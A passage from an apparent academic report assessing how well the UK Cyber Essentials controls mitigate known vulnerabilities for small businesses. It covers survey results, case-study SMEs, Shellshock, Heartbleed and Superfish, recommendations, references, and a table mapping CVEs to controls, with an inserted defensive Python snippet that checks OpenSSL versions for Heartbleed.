User Access: More than half of SMEs permit employees' own devices to be used in the workplace. For organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine allows vulnerability into the whole company.
Existing Security Measures: Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below these are access control, malware protection and finally patch management, which is present in a little over half of organisations.
Almost two-thirds of survey participants were previously aware of Cyber Essentials.
Survey Respondents Network
The network built from survey respondents' data considers the overall response in order to build a network easily adaptable to match that of the majority of SME network configurations.
Locally, email and file servers have been represented, with domain controller capabilities represented in a network ADSL router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.
Figure 13: Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the survey respondents' network, aspects of each of the interviewed SME networks are apparent.
The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.
The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.
The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.
The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.
Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015.
These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.
With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.
“ShellShock”
Also known by the name “BashDoor”, Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock”. NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
CVE-2014-6271 [13]
The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.
The threat was particularly insidious for SMEs who used Linux/Unix-based servers for services (mail servers, as an example), as they would potentially have no idea that they had been compromised.
“Heartbleed”
Appearing in April 2014, the CVE-2014-0160 (aka “Heartbleed”) bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.
As described in the original CVE report:
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0160 [12]
As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.
Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-unupdated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.
Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.
It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
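Added here as an example (not from the report): a version-string triage for the range quoted above, "OpenSSL 1.0.1 before 1.0.1g", carrying the caveat the passage points at, that an SME often cannot tell from a version number alone whether an operator has applied a backported fix. The function names and the sample version strings are this example's own assumptions.

```python
"""Version-range triage for the Heartbleed advisory text, "OpenSSL 1.0.1
before 1.0.1g". Added example, not part of the report. It only reads a
version string: distributions that backport the fix keep the old version
number, so "affected" here means "check further", never proof."""
import re

# Matches "1.0.1e" inside e.g. "OpenSSL 1.0.1e 11 Feb 2013" (sample format).
_VERSION = re.compile(r"(\d+)\.(\d+)\.(\d+)([a-z]*)")

FIRST_AFFECTED = (1, 0, 1, "")    # 1.0.1 with no letter suffix
FIRST_FIXED = (1, 0, 1, "g")      # 1.0.1g carries the fix


def parse_openssl_version(text):
    """Return (major, minor, patch, letter). An empty letter sorts before
    any letter, so 1.0.1 < 1.0.1a < ... < 1.0.1g, matching OpenSSL's
    pre-1.1 release ordering."""
    m = _VERSION.search(text)
    if not m:
        raise ValueError(f"unrecognised OpenSSL version string: {text!r}")
    major, minor, patch, letter = m.groups()
    return (int(major), int(minor), int(patch), letter)


def heartbleed_version_affected(text):
    """True when the reported version lies in [1.0.1, 1.0.1g)."""
    return FIRST_AFFECTED <= parse_openssl_version(text) < FIRST_FIXED


def triage(text, vendor_backported_fix=False):
    """Verdict for one host. A vendor may ship the fix as a patch to an
    older version string (a patched '1.0.1e', for instance), which the
    version alone cannot reveal; the caller must supply that fact."""
    if not heartbleed_version_affected(text):
        return "not affected by version"
    if vendor_backported_fix:
        return "affected version, vendor reports backported fix"
    return "affected version, patch or confirm with vendor"


if __name__ == "__main__":
    # Constructed sample strings, not captured from real hosts.
    for sample in ("OpenSSL 1.0.1e 11 Feb 2013", "OpenSSL 1.0.1g 7 Apr 2014",
                   "OpenSSL 1.0.0l", "OpenSSL 1.0.2"):
        print(sample, "->", triage(sample))
```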
“Superfish”
The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.
CVE-2015-2077 [14]
This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the ‘normal configuration’ for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.
The vector is through the SuperFish software, which essentially breaks the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and then they have full access to any SSL-secured connection from the target machine.
Thankfully, while the risks to users and SMEs were high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and the issue is mitigated fully through the Cyber Essentials patch management advice.
Threat Analysis
ShellShock: Without Cyber Essentials in place, SMEs 1 and 2 would be at risk from ‘Shellshock’, as they both operate Unix/Linux-based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.
With Cyber Essentials, SMEs 1 and 2 would be fully protected, and it is likely that SMEs 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.
Heartbleed: The ‘Heartbleed’ bug is another vulnerability that, without the Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.
In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and the application of access controls from the Cyber Essentials guidelines.
SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the ‘Superfish’ issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.
Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following ‘normal’ patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.
Conclusions

The Cyber Essentials security tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight exploits could not be resolved with the deployment of security patches; for vulnerabilities such as these, the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.
Scope: It is important to consider that the scope of this study covers only internet-based, commodity-level attacks and, although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least from malicious acts but also from users unknowingly compromising security.
The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.
Additional Tools
The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials scheme well, to deliver additional security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by fortifying each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.
There exist some collective approaches to improving cyber-security; a notable example of this is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.
An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (around 600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations, as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.
Cyber Essentials Controls
Of the five current Cyber Essentials controls, patch management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The most widely used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewall. Patch management, by contrast, isn't necessarily understood by individuals as a tool to greatly improve cyber-security.
Anti-malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that anti-malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber-safety.
Recommendations
To further improve cyber-security across the UK, we recommend that:
1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.
2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.
3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attacks mentioned above, which were not within the scope of this report.
References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.
[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.
[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.
[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp, March 2013.
[5] CREST. Cyber Essentials certified companies. http://www.cyberessentials.org/list, March 2015.
[6] CVE, Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.
[7] Cyber Essentials. Cyber Essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.
[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.
[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-cluster, 2015.
[10] HM Government. Cyber Essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.
[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.
[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.
[13] Mitre.org. CVE-2014-6271 aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.
[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.
[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.
[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.
[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.
CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster, Page 13 of 28
Cyber Controls Applicability

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration - no JS
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
